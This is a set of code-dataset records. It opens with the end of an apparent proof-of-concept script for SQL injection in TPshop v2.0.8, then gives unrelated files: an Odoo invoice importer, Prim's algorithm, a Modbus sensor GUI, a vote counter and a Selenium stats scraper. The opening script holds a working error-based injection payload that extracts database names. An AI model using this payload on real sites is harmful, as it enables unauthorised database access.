self.url\n result['Database'] = {}\n result['Database']['DBname'] = dbname1[0]\n break\n return self.parse_output(result)\n\n def _verify(self):\n \"\"\"verify mode\"\"\"\n result = {}\n payload1 = '/index.php/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(select count(*) from information_schema.columns group by concat(0x7e,1,0x7e,floor(rand()*2)))' \n while True:\n resp = req.get(self.url + payload1)\n dbname1 = re.findall(\"~(.*?)~\", resp.content)\n time.sleep(2)\n if dbname1:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n break\n\n return self.parse_output(result)\n\n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('Internet nothing returned')\n return output\n\n\nregister(TestPOC)\n\n","sub_path":"tpshop/tpshopv2.0.8.SQL_Injection_Vulnerability.py","file_name":"tpshopv2.0.8.SQL_Injection_Vulnerability.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186374651","text":"# -*- coding: utf-8 -*-\nfrom StringIO import StringIO\nfrom datetime import datetime, date\nfrom odoo import api, fields, models\nimport base64\n\n\nclass TxtImport(models.TransientModel):\n _name = 'txt.import'\n _description = u\"Upload mora Txt \"\n\n #txt = fields.Many2many('ir.attachment', string=u'Cargar .txt', )\n fichero = fields.Binary(u'Archivo CREP')\n\n\n\n @api.multi\n def procesar_txt(self):\n data = []\n fichero = base64.decodestring(self.fichero)\n io = StringIO(fichero)\n\n i = 0\n while i < 2:\n linea = io.readline()\n if linea == '':\n i = i + 1\n else:\n if linea.find('EFECTIVO') == -1:\n pass\n else:\n line = linea.split()\n inquilino = line[1][8:]\n if inquilino != '':\n monto = line[2].replace('\"', '')\n inquilino = inquilino\n else:\n inquilino = line[2]\n monto = line[3]\n valores = {'referencia': inquilino, 'monto': monto}\n data.append(valores)\n\n for datos in data:\n self.crear_boleta_mora(datos)\n #if datos['referencia'] == 'GM07263007D04K' :\n\n\n\n @api.multi\n def crear_boleta_mora(self, data):\n if data:\n # suscripcion = self.env['sale.subscription'].search([('code', '=', data['referencia'])])\n # cliente_id = suscripcion.partner_id.id\n referencia = data['referencia']\n #ref2 = referencia.replace(\"'\",\"\" )\n facturas = self.env['account.invoice'].search([('origin', 'ilike', referencia),('state', '=','open')])\n #facturas2 = self.env['account.invoice'].search([\n # ('origin', '=', ref2)])\n if facturas:\n monto_total = 0.0\n for factura in facturas:\n monto_total = monto_total + factura.amount_total\n # generamos\n self.generar_boleta(factura, data['monto'], monto_total)\n #boleta_id = self.generar_boleta(factura,boleta_id, data['monto'], monto_total).get('boleta_id')\n #view_id = self.env.ref('biosis_facturacion.biosis_facturacion_boleta_mora_tree').id\n # return {\n # 'name': u'Boleta sujeta a mora',\n # 'type': 'ir.actions.act_window',\n # 'view_type': 'tree',\n # 'view_mode': 'tree',\n # 'target': 'current',\n # 'res_model': 'account.invoice',\n # 'res_id': boleta_id,\n # 'view_id': view_id,\n #\n # }\n\n # mostramos el formulario nada mas\n # view_id = self.env.ref('biosis_facturacion.biosis_facturacion_boleta_mora_form').id\n # return {\n # 'name': u'Boleta Mora',\n # 'type': 'ir.actions.act_window',\n # 'view_type': 'form',\n # 'view_mode': 'form',\n # 'target': 'current',\n # 'res_model': 'account.invoice',\n # 'res_id': boleta_id,\n # 'view_id': view_id,\n #\n # }\n\n\n\n\n 
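    # The method below prices the late-fee ("mora") boleta as the difference
    # between the amount reported in the CREP text file and the total of the
    # customer's open invoices, copying one invoice line to carry that surcharge.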
@api.multi\n def generar_boleta(self, invoice, monto_txt, monto_total):\n conteo = 0\n # for invoice in self:\n boleta_id = self.env['einvoice.catalog.01'].search([('code', '=', '03')]).id\n\n boleta_vals = {\n #'invoice_id': invoice.id,\n 'date_invoice': datetime.now().strftime('%Y-%m-%d'),\n 'account_id': invoice.account_id.id,\n 'tipo_operacion': invoice.tipo_operacion,\n 'partner_id': invoice.partner_id.id,\n 'tipo_comprobante_id': boleta_id,\n 'state': 'draft',\n 'currency_id': invoice.currency_id.id,\n 'is_boleta_mora': True\n }\n #boleta = self.env['account.invoice'].create(boleta_vals)\n fact = self.env['account.invoice'].create(boleta_vals)\n # Copiar lineas de factura.\n\n line2 = {}\n for line in invoice.invoice_line_ids:\n line2 = line.copy()\n monto = monto_txt.replace(',','')\n line2.price_unit = float(monto) - monto_total\n line2.write({'invoice_id': fact.id})\n\n return fact\n\n","sub_path":"biosis_moras/models/account_invoice_import_txt.py","file_name":"account_invoice_import_txt.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503910203","text":"def Prim(n,w,cost):\r\n mincost = [float('inf')]*n\r\n used = [False]*n\r\n mincost[0] = 0\r\n res = 0\r\n \r\n while True:\r\n v = -1\r\n for i in range(n):\r\n if (not used[i]) and (v==-1 or mincost[i] < mincost[v]):\r\n v = i\r\n if v == -1:\r\n break\r\n used[v] = True\r\n res += mincost[v]\r\n for i in range(n):\r\n mincost[i] = min(mincost[i], cost[v][i])\r\n return res\r\n\r\ndef Prim_heap():\r\n import heapq\r\n used = [True]*n\r\n edgelist = []\r\n for e in edge[0]:\r\n heapq.heappush(edgelist, e)\r\n used[0] = False\r\n res = 0\r\n while len(edgelist) != 0:\r\n minedge = heapq.heappop(edgelist)\r\n if not used[minedge[1]]:\r\n continue\r\n v = minedge[1]\r\n used[v] = False\r\n for e in edge[v]:\r\n if used[e[1]]:\r\n heapq.heappush(edgelist, e)\r\n res += minedge[0]\r\n return res\r\nn,w = map(int,input().split())\r\nedge = [[] for i in range(n)]\r\n#隣接リスト edge[i]:[コスト,行先]\r\nfor i in range(w):\r\n x,y,z = map(int,input().split())\r\n edge[x].append([z,y])\r\n edge[y].append([z,x])\r\nprint(prim_heap())","sub_path":"libraries/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411798415","text":"from pyModbusTCP.client import ModbusClient\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\nimport tkinter\nimport datetime as dt\nimport pandas as pd\nimport pymongo\nimport plotly.express as px\nimport numpy as np\n\nstart_regs = 120\nsensor_no = ModbusClient(host=\"192.40.50.107\", port=10010, unit_id=1, auto_open=True)\nsensor_no.open()\nregs = sensor_no.read_holding_registers(0, start_regs)\nif regs:\n print(regs)\nelse:\n print(\"read error\")\n\nfor n in range(start_regs // 2):\n data_count = n * 2\n regs[data_count], regs[data_count + 1] = regs[data_count + 1], regs[data_count]\n\ndec_array = regs\n\ndata_bytes = np.array(dec_array, dtype=np.uint16)\ndata_as_float = data_bytes.view(dtype=np.float32)\n\ntime_data = dt.datetime.now().strftime('%Y-%m-%d %X')\n\nstart = 1\nstart_range = start_regs // 2\n\nvalue = [[num for num in range(start, start + start_range)],\n [num for num in range(start, start + start_range)],\n data_as_float]\n\ndata = np.array(value).T.tolist()\n\nproducts = data\narr = []\nfor product in products:\n vals = {}\n vals[\"Sensor No\"] = 
str(int(product[1]))\n vals[\"Temp\"] = str(round(product[2], 4))\n vals[\"Time\"] = str(time_data)\n arr.append(vals)\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb = myclient[\"Modbus_Database\"]\n\nmycol = mydb[\"collection1\"]\n\nrecord_data = arr\nmycol.insert_many(record_data)\n\ndocuments = list(mycol.find({}, {'_id': 0}))\nres = [list(idx.values()) for idx in documents]\n\nfor index1, row in enumerate(res):\n for index2, item in enumerate(row):\n try:\n res[index1][index2] = (float(item))\n except ValueError:\n pass\n\n\nclass ModbusOop(object):\n def __init__(self):\n self.root = tk.Tk()\n self.style = ttk.Style()\n self.style.map(\"Treeview\", foreground=self.fixed_map(\"foreground\"), background=self.fixed_map(\"background\"))\n self.tree = ttk.Treeview(self.root)\n self.canvas = tk.Canvas(self.root, width=1580, height=600)\n\n def fixed_map(self, option):\n return [elm for elm in self.style.map(\"Treeview\", query_opt=option) if elm[:2] != (\"!disabled\", \"!selected\")]\n\n def on_double_click(self, event):\n item = self.tree.identify('item', event.x, event.y)\n\n print(self.tree.item(item, \"text\"))\n\n xs_doc = list(\n mycol.find(\n {\"$and\": [{\"Sensor No\": self.tree.item(item, \"text\")},\n {\"Time\": {\"$gte\": \"2021-05-31 13:14:58\",\n \"$lt\": dt.datetime.now().strftime('%Y-%m-%d %X')}}]},\n {'_id': 0}))\n\n xs_res = [list(idx.values()) for idx in xs_doc]\n\n df = pd.DataFrame(list(xs_doc))\n df['Temp'] = df['Temp'].astype(np.float64)\n\n for index1, row in enumerate(xs_res):\n for index2, item in enumerate(row):\n try:\n xs_res[index1][index2] = (float(item))\n except ValueError:\n pass\n df = pd.DataFrame(xs_doc)\n df['Temp'] = df['Temp'].astype(np.float64)\n fig = px.line(df, x='Time', y='Temp', title='Temperature °C - Time', color='Sensor No')\n\n fig.update_xaxes(\n rangeselector=dict(\n buttons=list([\n dict(count=1, label=\"1m\", step=\"month\", stepmode=\"backward\"),\n dict(count=3, label=\"3m\", step=\"month\", stepmode=\"backward\"),\n dict(count=6, label=\"6m\", step=\"month\", stepmode=\"todate\"),\n dict(count=1, label=\"1y\", step=\"year\", stepmode=\"backward\"),\n dict(step=\"all\")\n ])\n )\n )\n\n return fig.show()\n\n def _quit(event):\n sys.exit()\n\n def window_table(self):\n\n self.root.title(\"Sensor's Temperatures °C\")\n self.root.geometry(\"480x630\")\n self.root.grid()\n\n p1 = PhotoImage(file='images1.png')\n self.root.iconphoto(False, p1)\n\n self.tree.pack(side='top', fill=tkinter.BOTH, expand=True)\n\n verscrlbar = ttk.Scrollbar(self.root,\n orient=\"vertical\",\n command=self.tree.yview)\n\n self.tree.configure(xscrollcommand=verscrlbar.set)\n\n self.tree[\"columns\"] = (\"1\", \"2\", \"3\")\n\n self.tree['show'] = 'headings'\n\n self.tree.column(\"1\", width=125, minwidth=30, anchor='c')\n self.tree.column(\"2\", width=65, minwidth=30, anchor='c')\n self.tree.column(\"3\", width=115, minwidth=30, anchor='c')\n\n self.tree.heading(\"1\", text=\"Time\")\n self.tree.heading(\"2\", text=\"Sensor No\")\n self.tree.heading(\"3\", text=\"Temperature °C\")\n\n self.tree.bind(\"\", self.on_double_click)\n\n self.canvas.create_rectangle(10, 150, 1580, 170, fill='grey', outline='white', tag='rect1')\n self.canvas.create_rectangle(10, 500, 1580, 520, fill='grey', outline='white', tag='rect2')\n self.canvas.create_rectangle(365, 170, 385, 500, fill='grey', outline='white', tag='rect3')\n\n start3 = 45\n n = 1\n for z in range(26):\n self.canvas.create_text(start3, 140, text=n)\n self.canvas.create_text(start3, 530, 
text=n + 34)\n start3 += 60\n n += 1\n\n start4 = 195\n f = 27\n for t in range(8):\n self.canvas.create_text(395, start4, text=f)\n start4 += 40\n f += 1\n\n start_range = 0\n id_count = 1\n start = 40\n\n self.tree.tag_configure('high', foreground='red')\n self.tree.tag_configure('low', foreground='black')\n\n for record in res[-(start_regs // 2):]:\n sensor_id = record[0]\n temperature = record[1]\n date_time = record[2]\n if float(temperature) > 30.0:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('high',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 25.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n else:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('low',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n start_range += 1\n id_count += 1\n\n menu = Menu(self.root)\n self.root.config(menu=menu)\n menu.add_cascade(label='Quit', command=self._quit)\n\n self.tree.after(60000, self.update_window_table)\n 
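        # after(60000, ...) queues update_window_table on the Tk event loop in
        # 60 s (and that method re-queues itself), so the treeview and canvas
        # refresh periodically without blocking mainloop().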
self.canvas.pack()\n return self.root.mainloop()\n\n def update_window_table(self):\n\n start_range = 0\n id_count = 1\n start = 40\n\n for i in self.tree.get_children():\n self.tree.delete(i)\n\n for record in res[-(start_regs // 2):]:\n sensor_id = record[0]\n temperature = record[1]\n date_time = record[2]\n if float(temperature) > 30.0:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('high',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 25.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n else:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('low',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n start_range += 1\n id_count += 1\n\n self.root.update()\n self.root.update_idletasks()\n self.tree.after(60000, self.update_window_table)\n self.canvas.pack()\n return self.root.mainloop()\n\n\ndef main():\n while True:\n rn = ModbusOop()\n rn.window_table()\n rn.update_window_table()\n sys.exit()\n\n\nif __name__ == 
","sub_path":"version69.py","file_name":"version69.py","file_ext":"py","file_size_in_byte":16293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567699980","text":"import os\nimport csv\n\ncsvpath = os.path.join(\"Election1.csv\")\n\nwith open(csvpath, newline=\"\") as csvfile:\n    csvreader = csv.DictReader(csvfile)\n\n    total_votes1 = 0\n    all_votes1 = {}\n    for row in csvreader:\n        vote = row[\"Canadiate\"]  # the column header is spelled this way in Election1.csv\n        if vote in all_votes1:\n            all_votes1[vote] += 1\n        else:\n            all_votes1[vote] = 1\n\n        total_votes1 += 1\n\ncsvpath = os.path.join(\"Election2.csv\")\n\nwith open(csvpath, newline=\"\") as csvfile:\n    csvreader2 = csv.DictReader(csvfile)\n\n    total_votes2 = 0\n    all_votes2 = {}\n    for row in csvreader2:\n        vote2 = row[\"Candidate\"]\n        if vote2 in all_votes2:\n            all_votes2[vote2] += 1\n        else:\n            all_votes2[vote2] = 1\n\n        total_votes2 += 1\n\n    # merge the first election's tallies into the second; dict.update() would\n    # overwrite, not add, the counts of candidates present in both files\n    for name in all_votes1:\n        if name in all_votes2:\n            all_votes2[name] += all_votes1[name]\n        else:\n            all_votes2[name] = all_votes1[name]\n\n    total_votes3 = total_votes1 + total_votes2\n\n    for name in all_votes2:\n        print(name + \" \" + str(all_votes2[name]) + \" \" + str(round((all_votes2[name] / total_votes3) * 100)) + \"%\")\n\n    winner3 = None\n    winner_votes3 = 0\n    for name in all_votes2:\n        if all_votes2[name] > winner_votes3:\n            winner3 = name\n            winner_votes3 = all_votes2[name]\n\n    print(\"Winner:\", winner3)\n\n    print(str(total_votes3) + \" Total Votes\")\n\n\n# with open('output.txt', 'w') as text_file:\n#     for name in all_votes2:\n#         text_file.write(name + \" \" + str(all_votes2[name]) + \" \" + str(round((all_votes2[name] / total_votes3) * 100)) + \"%\\n\")\n#     text_file.write(\"Winner: \" + str(winner3) + \"\\n\")\n#     text_file.write(str(total_votes3) + \" Total Votes\\n\")\n","sub_path":"PyPoll/Election2.py","file_name":"Election2.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269687655","text":"import os\nimport pickle\nimport pprint\nimport time\n\nfrom selenium import webdriver\n#from selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.keys import Keys\n\nBSB_URL = os.environ.get('BSB_URL')\nBSB_URL_HREF = BSB_URL.replace('http:', 'https:').replace('www.', '')\nBSB_URL_LOGIN = BSB_URL + '/login'\nBSB_URL_TEAMS = BSB_URL + '/account/teams?redirect=None&page_number=0&page_size=100'\nBSB_URL_GAMES = '/schedule/games'\nBSB_URL_ROSTER = '/roster'\nBSB_URL_PROFILE = '/profile'\nBSB_URL_STATS_BATTING = '/stats'\nBSB_URL_STATS_PITCHING = '/stats/pitching'\nBSB_URL_STATS_FIELDING = '/stats/fielding'\nBSB_URL_STATS_CATCHING = '/stats/fielding/Qualified/expanded'\nBSB_URL_RECAP = '/recap-story'\nBSB_URL_STATS = '/stats'\nBSB_URL_PLAYS = '/plays'\n\nPAGE_WAIT = 0\nPAGE_WAIT_GAME = 0\nPAGE_WAIT_APP = 0\n\npage_count = 0\n\ndef init_browser():\n    # browser = webdriver.Chrome()\n\n    browser = webdriver.Firefox()\n\n    # Chrome headless didn't work\n    # options = Options()\n    # options.headless = True\n    # options.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\")\n    # browser = webdriver.Chrome(options=options)\n\n    # Firefox headless works (not really faster)\n    # options = Options()\n    # options.headless = True\n    # browser = webdriver.Firefox(options=options)\n\n    browser.set_window_size(1000, 1000)\n    return browser\n\n\ndef browser_get(browser, href, waitTime):\n    
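\"\"\"Fetch href in the browser, wait waitTime seconds for the page to settle, and log the visit in the global page counter.\"\"\"\n    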
global page_count\n\n    browser.get(href)\n    time.sleep(waitTime)\n    print(href)\n    # browser.save_screenshot(\"screenshot%02d.png\" % page_count)\n    page_count += 1\n\ndef process_login(browser):\n    browser_get(browser, BSB_URL, 0)\n\n    elem = browser.find_element_by_xpath('//a[@href=\"/login\"]')\n    elem.click()\n    browser.implicitly_wait(10)\n\n    elem = browser.find_element_by_id('email')\n    elem.send_keys(os.environ.get('BSB_EMAIL'))\n    elem = browser.find_element_by_id('login_password')\n    elem.send_keys(os.environ.get('BSB_PASSWORD'))\n    elem = browser.find_element_by_id('login')\n    elem.click()\n\n\ndef process_teams(browser, data):\n    if len(data['teams']) == 0:\n        # go to TEAMS page\n        browser_get(browser, BSB_URL_TEAMS, 0)\n\n        # get list of team urls\n        links = browser.find_elements_by_css_selector('h2 a')\n        for link in links:\n            href = link.get_attribute('href')\n            data['teams'].append(href)\n\n\ndef process_team_data(browser, team):\n    team['profile'] = {}\n    team['profile']['Stats set to:'] = ''\n    team['roster'] = []\n    team['stats'] = {}\n    team['stats']['batting'] = []\n    team['stats']['pitching'] = []\n    team['stats']['fielding'] = []\n    team['stats']['catching'] = []\n    team['games'] = []\n\n\ndef process_team_profile(browser, team):\n    href = team['href'] + BSB_URL_PROFILE\n    browser_get(browser, href, PAGE_WAIT)\n\n    trs = browser.find_elements_by_css_selector('tr')\n    for tr in trs:\n        th = tr.find_elements_by_css_selector('th')\n        td = tr.find_elements_by_css_selector('td')\n        profileLabel = th[0].text.replace('[?]', '').strip()\n        profileValue = td[0].text\n        team['profile'][profileLabel] = profileValue\n        if \"RSVP\" in profileLabel:\n            break\n\n\ndef process_team_roster(browser, team):\n    href = team['href'] + BSB_URL_ROSTER\n    browser_get(browser, href, PAGE_WAIT)\n\n    ths = browser.find_elements_by_css_selector('.rosterHead th')\n    trs = browser.find_elements_by_css_selector('.rosterBody tr')\n    for tr in trs:\n        player = {}\n        td = tr.find_elements_by_css_selector('td')\n        for i in range(len(ths)):\n            playerLabel = ths[i].text\n            playerValue = td[i].text\n            player[playerLabel] = playerValue\n        team['roster'].append(player)\n\ndef process_team_stats_page(browser, team, url, page):\n    href = team['href'] + url\n    browser_get(browser, href, PAGE_WAIT)\n\n    ths = browser.find_elements_by_css_selector('thead tr th')\n    trs = browser.find_elements_by_css_selector('.statTable tbody tr')\n    for tr in trs:\n        player = {}\n        tds = tr.find_elements_by_css_selector('td')\n        for i in range(len(ths)):\n            playerLabel = ths[i].text\n            playerValue = tds[i].text\n            player[playerLabel] = playerValue\n        team['stats'][page].append(player)\n\n\ndef process_games(browser, team):\n    href = team['href'] + BSB_URL_GAMES\n    browser_get(browser, href, PAGE_WAIT)\n\n    foundHrefs = []\n    links = browser.find_elements_by_css_selector('li a')\n    for link in links:\n        href = link.get_attribute('href')\n        hrefStr = str(href)\n        if hrefStr.startswith(BSB_URL_HREF + '/game-') and not hrefStr.endswith('/recap-story'):\n            if not hrefStr in foundHrefs:\n                game = {}\n                game['href'] = hrefStr\n                team['games'].append(game)\n                foundHrefs.append(hrefStr)\n\n\ndef process_game_recap(browser, game):\n    href = game['href'] + BSB_URL_RECAP\n    browser_get(browser, href, PAGE_WAIT_GAME)\n\n    game['location'] = ''\n    game['date'] = ''\n    game['time'] = ''\n    game['away-score'] = ''\n    game['home-score'] = ''\n    game['recap'] = []\n\n    try:\n        elem = browser.find_element_by_css_selector('span#location')\n        game['location'] = elem.text\n        elem = browser.find_element_by_css_selector('time#headerDate')\n        game['date'] = elem.text\n        elem = browser.find_element_by_css_selector('time#headerTime')\n        game['time'] = elem.text\n    except:\n        pass\n\n    try:\n        elem = browser.find_element_by_css_selector('div.awayScore')\n        game['away-score'] = elem.text\n        elem = browser.find_element_by_css_selector('div.homeScore')\n        game['home-score'] = elem.text\n    except:\n        del game['away-score']\n        del game['home-score']\n        pass\n\n    elem = browser.find_element_by_css_selector('h1#left')\n    game['away-name'] = elem.text\n    elem = browser.find_element_by_css_selector('h1#right')\n    game['home-name'] = elem.text\n\n    try:\n        lis = browser.find_elements_by_css_selector('li.recapText')\n        for li in lis:\n            game['recap'].append(li.text)\n    except:\n        pass\n\n\nBSB_GAME_TABLE_AWAY_BATTING = 0\nBSB_GAME_TABLE_HOME_BATTING = 1\nBSB_GAME_TABLE_AWAY_PITCHING = 2\nBSB_GAME_TABLE_HOME_PITCHING = 3\n\n\ndef _parse_gc_table(tables, index, label_to_replace):\n    # One parser for the four near-identical box score tables: header cells become\n    # dict keys, with the 'Lineup'/'Pitching' column renamed to 'name'.\n    players = []\n    try:\n        ths = tables[index].find_elements_by_css_selector('thead tr th')\n        trs = tables[index].find_elements_by_css_selector('tbody tr')\n        for tr in trs:\n            player = {}\n            tds = tr.find_elements_by_css_selector('td')\n            for i in range(len(ths)):\n                playerLabel = ths[i].text.replace(label_to_replace, 'name')\n                playerValue = tds[i].text\n                player[playerLabel] = playerValue\n            players.append(player)\n    except:\n        pass\n    return players\n\n\ndef process_game_boxscore(browser, game):\n    href = game['href'] + BSB_URL_STATS\n    browser_get(browser, href, PAGE_WAIT_GAME)\n\n    game['boxscore'] = {}\n    game['boxscore']['away-fieldsets'] = []\n    game['boxscore']['home-fieldsets'] = []\n\n    # get 4 tables/sections\n    tables = browser.find_elements_by_css_selector('table.gcTable')\n\n    game['boxscore']['away-batting'] = {'lineup': _parse_gc_table(tables, BSB_GAME_TABLE_AWAY_BATTING, 'Lineup')}\n    game['boxscore']['home-batting'] = {'lineup': _parse_gc_table(tables, BSB_GAME_TABLE_HOME_BATTING, 'Lineup')}\n    game['boxscore']['away-pitching'] = {'pitchers': _parse_gc_table(tables, BSB_GAME_TABLE_AWAY_PITCHING, 'Pitching')}\n    game['boxscore']['home-pitching'] = {'pitchers': _parse_gc_table(tables, BSB_GAME_TABLE_HOME_PITCHING, 'Pitching')}\n\n    # get the fieldsets (sublists of 2B: 3B: etc) for away\n    fieldsets = browser.find_elements_by_css_selector('div.prm fieldset')\n    for fieldset in fieldsets:\n        game['boxscore']['away-fieldsets'].append(fieldset.text)\n\n    # get the fieldsets (sublists of 2B: 3B: etc) for home\n    fieldsets = browser.find_elements_by_css_selector('div.plm fieldset')\n    for fieldset in fieldsets:\n        game['boxscore']['home-fieldsets'].append(fieldset.text)\n\n\n
def process_game_plays(browser, game):\n    href = game['href'] + BSB_URL_PLAYS\n    browser_get(browser, href, PAGE_WAIT_GAME)\n\n    game['plays'] = []\n\n    trs = browser.find_elements_by_css_selector('#playByPlayContainer tr')\n    for tr in trs:\n        temp = tr.text.replace(u\"\\u2022\", '-').replace(u\"\\u01c0\", '|')\n        game['plays'].append(temp)\n\n\ndef match_alias(name, alias):\n    for a in alias:\n        if a in name:\n            return True\n    return False\n\ndef process_games_with_alias(browser, team, alias, year, season, data):\n    href = team + BSB_URL_GAMES\n    browser_get(browser, href, PAGE_WAIT)\n\n    if year and not year in href:\n        return\n\n    if season and not season in href:\n        return\n\n    foundHrefs = []\n    links = browser.find_elements_by_css_selector('li a')\n    for link in links:\n        href = link.get_attribute('href')\n        hrefStr = str(href)\n        if hrefStr.startswith(BSB_URL_HREF + '/game-') and not hrefStr.endswith('/recap-story'):\n            if not hrefStr in foundHrefs:\n                if (match_alias(link.text, alias)):\n                    print(team)\n                    print(link.text)\n                    game = {}\n                    game['team_url'] = team\n                    game['alias_match'] = link.text\n                    game['href'] = hrefStr\n                    data['games'].append(game)\n                    foundHrefs.append(hrefStr)\n\n\ndef process_teams_with_alias(browser, data, alias, year, season):\n    if len(data['teams']) == 0:\n        # go to TEAMS page\n        browser.get(BSB_URL_TEAMS)\n        time.sleep(PAGE_WAIT)\n\n        # get list of team urls\n        links = browser.find_elements_by_css_selector('h2 a')\n        for link in links:\n            href = link.get_attribute('href')\n            data['teams'].append(href)\n\n    # parse all teams for games vs our team in alias\n    for team in data['teams']:\n        process_games_with_alias(browser, team, alias, year, season, 